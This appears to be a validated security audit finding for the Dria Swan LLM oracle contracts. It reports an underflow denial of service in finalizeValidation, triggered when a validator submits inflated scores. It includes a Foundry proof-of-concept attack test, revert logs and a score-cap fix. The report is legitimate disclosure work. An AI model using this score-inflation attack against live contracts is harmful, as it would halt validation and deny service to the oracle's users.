Dria

Swan
NFT, Hardhat
21,000 USDC
Submission Details
Severity: high
Valid

Inflated Score Exploit: Risk of Underflow and Service Disruption

Summary

The finalizeValidation function of the LLMOracleCoordinator contract is susceptible to a Denial of Service (DoS) attack through inflated validator scores. When a malicious validator submits exaggerated scores, the calculated standard deviation (_stddev) can exceed the mean (_mean). The unsigned subtraction _mean - _stddev then underflows, so the transaction reverts and service is denied.

Vulnerability Details

The vulnerability lies in the finalizeValidation function, where the mean and standard deviation of the scores submitted by validators are computed and then used in a range check.

https://github.com/Cyfrin/2024-10-swan-dria/blob/c8686b199daadcef3161980022e12b66a5304f8e/contracts/llm/LLMOracleCoordinator.sol#L323C1-L372C6

function finalizeValidation(uint256 taskId) private {
    TaskRequest storage task = requests[taskId];

    // compute score for each generation
    for (uint256 g_i = 0; g_i < task.parameters.numGenerations; g_i++) {
        // get the scores for this generation, i.e. the g_i-th element of each validation
        uint256[] memory scores = new uint256[](task.parameters.numValidations);
        for (uint256 v_i = 0; v_i < task.parameters.numValidations; v_i++) {
            scores[v_i] = validations[taskId][v_i].scores[g_i];
        }

        // compute the mean and standard deviation
        (uint256 _stddev, uint256 _mean) = Statistics.stddev(scores);

        // compute the score for this generation as the "inner-mean"
        // and send rewards to validators that are within the range
        uint256 innerSum = 0;
        uint256 innerCount = 0;
        for (uint256 v_i = 0; v_i < task.parameters.numValidations; ++v_i) {
            uint256 score = scores[v_i];
@>>         if ((score >= _mean - _stddev) && (score <= _mean + _stddev)) {
                innerSum += score;
                innerCount++;

                // send validation fee to the validator
                _increaseAllowance(validations[taskId][v_i].validator, task.validatorFee);
            }
        }

        // set score for this generation as the average of inner scores
        uint256 inner_score = innerCount == 0 ? 0 : innerSum / innerCount;
        responses[taskId][g_i].score = inner_score;
    }

    // now, we have the scores for each generation
    // compute stddev for these and pick the ones above a threshold
    uint256[] memory generationScores = new uint256[](task.parameters.numGenerations);
    for (uint256 g_i = 0; g_i < task.parameters.numGenerations; g_i++) {
        generationScores[g_i] = responses[taskId][g_i].score;
    }

    // compute the mean and standard deviation
    (uint256 stddev, uint256 mean) = Statistics.stddev(generationScores);
    for (uint256 g_i = 0; g_i < task.parameters.numGenerations; g_i++) {
        // ignore lower outliers
        if (generationScores[g_i] >= mean - generationDeviationFactor * stddev) {
            _increaseAllowance(responses[taskId][g_i].responder, task.generatorFee);
        }
    }
}

  • The mean and standard deviation are sensitive to extreme score inputs. A single inflated score can push _stddev above _mean, which breaks the logic that uses these values to decide which validators are eligible for rewards.

  • When _stddev is greater than _mean, the lower bound _mean - _stddev of the range check (_mean ± _stddev) would be negative, which a uint256 cannot represent. The checked subtraction raises an arithmetic underflow panic and the entire transaction reverts.
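
As a minimal sketch of the failing comparison in isolation, the hypothetical contract below contrasts the flagged expression with a variant that clamps the lower bound at zero. RangeCheckDemo and both function names are illustrative and not part of the audited code. It assumes Solidity 0.8 or later, where arithmetic is checked by default. The clamped variant is only one possible way to avoid the panic, shown for contrast; it is not the fix recommended in this report.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// Hypothetical demo contract; not part of the audited codebase.
contract RangeCheckDemo {
    /// Mirrors the flagged comparison.
    /// Reverts with Panic(0x11) whenever stddev > mean, because
    /// `mean - stddev` underflows under checked arithmetic.
    function inRange(uint256 score, uint256 mean, uint256 stddev)
        external
        pure
        returns (bool)
    {
        return (score >= mean - stddev) && (score <= mean + stddev);
    }

    /// Same check with the lower bound clamped at zero (assumed alternative).
    /// The subtraction only runs when it cannot underflow.
    function inRangeClamped(uint256 score, uint256 mean, uint256 stddev)
        external
        pure
        returns (bool)
    {
        uint256 lower = stddev > mean ? 0 : mean - stddev;
        return score >= lower && score <= mean + stddev;
    }
}
```

With the values that appear in the PoC logs (mean 25041, stddev 43277), inRange(55, 25041, 43277) reverts, while inRangeClamped(55, 25041, 43277) returns true because the bounds become 0 and 68318.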

Impact

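The most immediate impact is a DoS condition: a single validator who submits inflated scores can make the call that reaches finalizeValidation revert, so validation of the affected task does not complete.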

POC

The POC demonstrates the vulnerability in the LLMOracleCoordinator contract where a malicious validator inflates scores, leading to an arithmetic underflow and transaction revert.

Setup Steps

  1. Initialize Validators:

    • Four validators are set up with addresses and registered with the required fee tokens, preparing them for the validation process.

  2. Score Configuration:

    • Validators are configured with two sets of scores:

      • Regular scores (55, 86, 99, 71) within an expected range of 1 to 100.

      • Inflated scores (100,000; 80,000; 90,000; 70,000) used by the malicious validator to attack.

  3. Attack Execution:

    • The first validator submits inflated scores (scores2) aiming to skew standard deviation calculations and induce an underflow.

  4. Validation & Execution:

    • Validators mine nonces and submit validations. The malicious scores produce abnormal variability, so _stddev exceeds _mean and the _mean - _stddev range check underflows.


function testMultipleRepliesToTaskRequest() public {
    vm.startPrank(user);

    // Register the user as a generator in the registry
    deal(address(feeToken), user, 1000 ether);
    feeToken.approve(address(registry), 1000 ether);
    registry.register(LLMOracleKind.Generator);

    bytes32 protocol = "test/1.0.0";
    bytes memory input = "Generate text";
    bytes memory models = "";
    LLMOracleTaskParameters memory params = LLMOracleTaskParameters(5, 4, 4); // Set numGenerations to 4 for this test

    // Simulate user having enough tokens and approving
    deal(address(feeToken), user, 100 ether);
    feeToken.approve(address(coordinator), 100 ether);
    uint256 taskId = coordinator.request(protocol, input, models, params);
    vm.stopPrank();

    // Define other users for responding
    address[] memory responders = new address[](4);
    responders[0] = address(0x456);
    responders[1] = address(0x789);
    responders[2] = address(0xABC);
    responders[3] = address(0xDEF);

    // Register all responders as generators
    for (uint256 i = 0; i < responders.length; i++) {
        deal(address(feeToken), responders[i], 1100 ether);
        vm.startPrank(responders[i]);
        feeToken.approve(address(registry), 1000 ether);
        registry.register(LLMOracleKind.Generator);
        vm.stopPrank();
    }

    // Each responder responds with a valid response
    bytes memory responseOutput = "Response output text";
    bytes memory metadata = "Oracle metadata";
    for (uint256 i = 0; i < responders.length; i++) {
        respondToTask(taskId, responders[i], responseOutput, metadata);
    }

    // Verify multiple responses are recorded
    LLMOracleTask.TaskResponse[] memory responses = coordinator.getResponses(taskId);
    assertEq(responses.length, 4);
    for (uint256 i = 0; i < responders.length; i++) {
        assertEq(responses[i].responder, responders[i]);
        // Additional checks as necessary for nonce, output, and metadata if desired
    }

    logTaskRequestDetails(taskId);
    logTaskResponseDetails(taskId);
}

function testValidateMultipleResponses() public {
    // Setup multiple responses using the existing test function
    testMultipleRepliesToTaskRequest();

    // Define validators and register them
    address[] memory validators = new address[](4);
    validators[0] = address(0x5678);
    validators[1] = address(0x6789);
    validators[2] = address(0x7890);
    validators[3] = address(0x8901);

    // Regular scores, one per generation
    uint256[] memory scores = new uint256[](4);
    scores[0] = 55;
    scores[1] = 86;
    scores[2] = 99;
    scores[3] = 71;

    // Inflated scores used by the malicious validator
    uint256[] memory scores2 = new uint256[](4);
    scores2[0] = 100000;
    scores2[1] = 80000;
    scores2[2] = 90000;
    scores2[3] = 70000;

    // Register all validators
    for (uint256 i = 0; i < validators.length; i++) {
        deal(address(feeToken), validators[i], 1100 ether);
        vm.startPrank(validators[i]);
        feeToken.approve(address(registry), 1000 ether);
        registry.register(LLMOracleKind.Validator);
        vm.stopPrank();
    }

    uint256 taskId = 1; // Assuming taskId from setup function is 1
    (address requester, , LLMOracleTaskParameters memory parameters, , , , , bytes memory input, ) = coordinator.requests(taskId);

    // Call validation from each validator
    bytes memory metadata = "Validator metadata";

    // Attack: the first validator submits the inflated scores
    vm.startPrank(validators[0]);
    uint256 attackerNonce = mineValidNonce(taskId, input, requester, validators[0], parameters.difficulty);
    coordinator.validate(taskId, attackerNonce, scores2, metadata); // Assuming validate accepts score array
    vm.stopPrank();

    // The remaining validators submit the regular scores
    for (uint256 i = 1; i < 4; i++) {
        vm.startPrank(validators[i]);
        uint256 nonce = mineValidNonce(taskId, input, requester, validators[i], parameters.difficulty);
        coordinator.validate(taskId, nonce, scores, metadata); // Assuming validate accepts score array
        vm.stopPrank();
    }

    // Verify validations are recorded correctly
    LLMOracleTask.TaskValidation[] memory validations = coordinator.getValidations(taskId);
    assertEq(validations.length, 4);
    for (uint256 i = 0; i < validators.length; i++) {
        assertEq(validations[i].validator, validators[i]);
    }

    logTaskRequestDetails(taskId);
    logTaskResponseDetails(taskId);
}

  • The test concludes with a revert due to arithmetic underflow, effectively demonstrating the potential for a Denial of Service (DoS) via manipulated score inputs.

Logs

│ │ ├─ [0] console::log("finalizeValidation entered") [staticcall]
│ │ │ └─ ← [Stop]
│ │ ├─ [0] console::log("_stddev : ", 43277 [4.327e4]) [staticcall]
│ │ │ └─ ← [Stop]
│ │ ├─ [0] console::log("_mean : ", 25041 [2.504e4]) [staticcall]
│ │ │ └─ ← [Stop]
│ │ └─ ← [Revert] panic: arithmetic underflow or overflow (0x11)
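
The logged values can be reproduced for the first generation, where the four submitted scores are 100000 (from scores2) and 55, 55, 55 (from scores). The sketch below assumes that Statistics.stddev computes a population standard deviation with integer division and a floor square root. The library source is not shown in this report, so StatsDemo, meanAndStddev, pocGenerationZero and isqrt are hypothetical stand-ins rather than the audited implementation.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// Hypothetical stand-in for the statistics step; not the audited library.
contract StatsDemo {
    /// Integer mean and population standard deviation of `data`.
    /// Uses absolute differences so the subtraction itself cannot underflow.
    function meanAndStddev(uint256[] memory data)
        public
        pure
        returns (uint256 mean, uint256 stddev)
    {
        require(data.length > 0, "empty data");

        uint256 sum = 0;
        for (uint256 i = 0; i < data.length; i++) {
            sum += data[i];
        }
        mean = sum / data.length;

        uint256 squares = 0;
        for (uint256 i = 0; i < data.length; i++) {
            uint256 diff = data[i] > mean ? data[i] - mean : mean - data[i];
            squares += diff * diff;
        }
        stddev = isqrt(squares / data.length);
    }

    /// Scores for generation 0 in the PoC: one inflated, three regular.
    function pocGenerationZero() external pure returns (uint256 mean, uint256 stddev) {
        uint256[] memory scores = new uint256[](4);
        scores[0] = 100000;
        scores[1] = 55;
        scores[2] = 55;
        scores[3] = 55;
        return meanAndStddev(scores);
    }

    /// Floor of the square root via the Babylonian method.
    function isqrt(uint256 x) internal pure returns (uint256 y) {
        if (x == 0) return 0;
        uint256 z = (x + 1) / 2;
        y = x;
        while (z < y) {
            y = z;
            z = (x / z + z) / 2;
        }
    }
}
```

Under these assumptions the sum of the scores is 100165, the integer mean is 25041, the integer variance is 1872938067, and its floor square root is 43277, which matches the _mean and _stddev values in the log. Since 43277 is greater than 25041, _mean - _stddev underflows.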

Tools Used

Foundry

Recommendations

Implement strict input validation checks to ensure submitted scores fall within a realistic and acceptable range. This can prevent overly large or malicious scores from being processed.

function validate(
    uint256 taskId,
    uint256 nonce,
    uint256[] calldata scores,
    bytes calldata metadata
)
    public
    onlyRegistered(LLMOracleKind.Validator)
    onlyAtStatus(taskId, TaskStatus.PendingValidation)
{
    TaskRequest storage task = requests[taskId];
    uint256 maxScore = 100; // Define a maximum allowable score limit

    // Ensure there is a score for each generation
    if (scores.length != task.parameters.numGenerations) {
        revert InvalidValidation(taskId, msg.sender);
    }

    // Validate that no score exceeds the maximum limit
++  for (uint256 i = 0; i < scores.length; i++) {
++      if (scores[i] > maxScore) {
++          revert("Score exceeds maximum allowable limit"); // Revert if any score is too high
++      }
++  }

    // ... rest of validate() unchanged ...
}

Updates

Lead Judging Commences

inallhonesty Lead Judge 7 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Underflow in `LLMOracleCoordinator::validate`
